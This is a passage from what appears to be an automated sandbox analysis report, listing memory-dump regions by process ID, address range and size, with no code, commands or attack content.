                                                                                                                                                                                                                                                                                • memory/3832-251-0x0000000005060000-0x000000000510C000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  688KB

                                                                                                                                                                                                                                                                                • memory/3832-219-0x0000000004D60000-0x0000000004D61000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/3832-263-0x0000000004D90000-0x0000000004DA1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  68KB

                                                                                                                                                                                                                                                                                • memory/3832-237-0x0000000004F70000-0x0000000004F71000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/3832-234-0x0000000004C60000-0x0000000004C61000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4048-383-0x00000000001C0000-0x00000000001CA000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                                • memory/4048-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4056-182-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                                                • memory/4056-161-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4080-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4080-257-0x00000000023C0000-0x000000000250A000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1.3MB

                                                                                                                                                                                                                                                                                • memory/4080-287-0x0000000000400000-0x00000000023BA000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  31.7MB

                                                                                                                                                                                                                                                                                • memory/4116-489-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4140-228-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-253-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-235-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-244-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-248-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-256-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-259-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-240-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-227-0x0000000003920000-0x000000000395C000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  240KB

                                                                                                                                                                                                                                                                                • memory/4140-265-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-261-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-268-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4140-304-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-303-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-296-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-290-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-289-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-279-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-272-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4140-276-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                • memory/4536-488-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4640-333-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4676-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4704-297-0x000000000041A616-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4704-294-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  128KB

                                                                                                                                                                                                                                                                                • memory/4704-325-0x0000000005170000-0x0000000005776000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                                • memory/4712-295-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  128KB

                                                                                                                                                                                                                                                                                • memory/4712-298-0x000000000041A76A-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4712-323-0x0000000005370000-0x000000000586E000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                                                                                • memory/4720-389-0x0000000000402FAB-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4720-392-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                • memory/4724-336-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4724-343-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  12KB

                                                                                                                                                                                                                                                                                • memory/4744-452-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4764-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4788-447-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/4948-345-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5048-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5052-444-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5152-483-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5192-456-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5244-492-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5296-491-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5344-464-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5376-493-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5436-495-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5512-496-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5584-498-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5616-499-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5624-501-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5760-476-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5828-477-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5836-507-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5924-531-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/5952-478-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6044-479-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6084-480-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6120-532-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6128-482-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                • memory/6136-515-0x0000000000000000-mapping.dmp